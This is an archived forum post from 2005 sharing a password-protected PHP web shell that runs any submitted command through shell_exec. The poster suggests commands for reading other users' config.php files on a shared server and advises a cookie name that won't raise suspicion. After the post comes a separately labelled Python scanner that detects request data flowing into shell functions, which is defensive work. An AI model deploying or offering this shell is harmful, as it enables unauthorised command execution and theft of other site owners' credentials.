Old 07-26-2005, 06:05 PM   · #1
unclekyky
Shell execution script

just a really simple, somewhat pointless, script that _can_ be used to view other people's PHP files (on the same server).

I'm sharing it to demonstrate a simple authentication method, highlighting php files, and using shell_exec.

some useful linux shell commands are:
ls /home/bob/public_html/
cat /home/bob/public_html/config.php

the script should work as is with the password "pass" (no quotes).
PHP Code:
<?php
// what is the password?
$pass = 'pass';
// cookie name - consider changing this to something that people won't suspect
$cookie_name = 'wjcookie';
// md5() the password
$md5_pass = md5($pass);

// checks to see if the cookie is set
if (!isset($_COOKIE[$cookie_name]))
{
    // if the cookie isn't set and the form hasn't been submitted: echo the form
    if (!isset($_POST['conf']))
    {
        echo "Password: <form action='{$_SERVER['PHP_SELF']}' method='post'>
                <input type='password' name='password'><br />
                <input type='hidden' name='conf'>
                <input type='submit'>
                </form>";
        die();
    }
    // if the cookie isn't set and the form has been submitted: check to see if the passwords match
    else
    {
        if ($_POST['password'] == $pass)
        {
            setcookie($cookie_name, $md5_pass, time()+3600, '/');
        }
        else
        {
            die('Wrong password.');
        }
    }
}
// if the cookie is set but the passwords don't match, then die
if (isset($_COOKIE[$cookie_name]))
{
    if ($_COOKIE[$cookie_name] != $md5_pass)
    {
        die("Invalid cookie information.");
    }
}
// if the passwords in the cookie match echo the form for the shell command
echo "<h2>Shell Execution Script</h2>
        <form method='post' action='{$_SERVER['PHP_SELF']}'>
        <input type='text' name='input' size='90'><br />
        <input type='submit'>
        </form>
        <br />";
// die if the form hasn't been submitted
if (!isset($_POST['input']))
{
    die();
}
// get the output from the command that was executed
$output = shell_exec($_POST['input']);
// this checks to see if the file is PHP then highlights it.
// (the "?" is escaped so the pattern matches a literal "<?php" opening tag)
if (preg_match('/<\?php/i', $output) || preg_match('/\.php/i', $_POST['input']))
{
    highlight_string($output);
    die();
}
// if not PHP then it echoes it out to the screen
echo nl2br(htmlspecialchars($output));
// command wasn't successful
if ($output == NULL)
{
    echo "No output.";
}
?>
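A defender-side check for the pattern in the script above, where `$_POST['input']` is passed straight to `shell_exec`. This is an added example, not part of the original post: the function name `find_tainted_exec`, the list of PHP functions and the PHP sample are constructed for illustration, and the matching is a line-based heuristic, not a PHP parser.

```python
import re

# PHP functions that pass a string to the system shell.
EXEC_FUNCS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open")
CALL = re.compile(r"\b(%s)\s*\((.*)" % "|".join(EXEC_FUNCS))
ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*(\.?=)(?![=>])(.*)")
REQUEST = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
VAR = re.compile(r"\$[A-Za-z_]\w*")

# Constructed sample input; only line 2 mirrors the call in the posted script.
SAMPLE = """<?php
$output = shell_exec($_POST['input']);   // request data goes straight to the shell
$cmd = 'ls ' . $_GET['dir'];
system($cmd);                            // same thing, one hop through a variable
$safe = 'uptime';
echo shell_exec($safe);                  // constant command
// passthru($_REQUEST['x']);             commented out
"""


def find_tainted_exec(php_source):
    """Return (line_no, function, statement) for shell calls fed by request data."""
    # Heuristic: line-based, follows plain `$var =` / `$var .=` assignments only.
    tainted = set()  # variables currently holding request-derived data

    def is_tainted(expr):
        return bool(REQUEST.search(expr)) or any(v in tainted for v in VAR.findall(expr))

    findings = []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        code = re.sub(r"(?<!:)//.*$", "", line)  # drop // comments, keep http://
        for stmt in code.split(";"):
            call = CALL.search(stmt)
            if call and is_tainted(call.group(2)):
                findings.append((line_no, call.group(1), stmt.strip()))
            assign = ASSIGN.search(stmt)
            if assign:
                var, op, rhs = assign.groups()
                if is_tainted(rhs):
                    tainted.add(var)
                elif op == "=":  # overwritten with clean data
                    tainted.discard(var)
    return findings


if __name__ == "__main__":
    for line_no, func, stmt in find_tainted_exec(SAMPLE):
        print(f"line {line_no}: {func}() receives request data: {stmt}")
```

Run over a web root, a hit means a file where anything sent in the request can become a shell command, which is worth reviewing whether the file was placed there deliberately or not.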


All times are GMT -7.

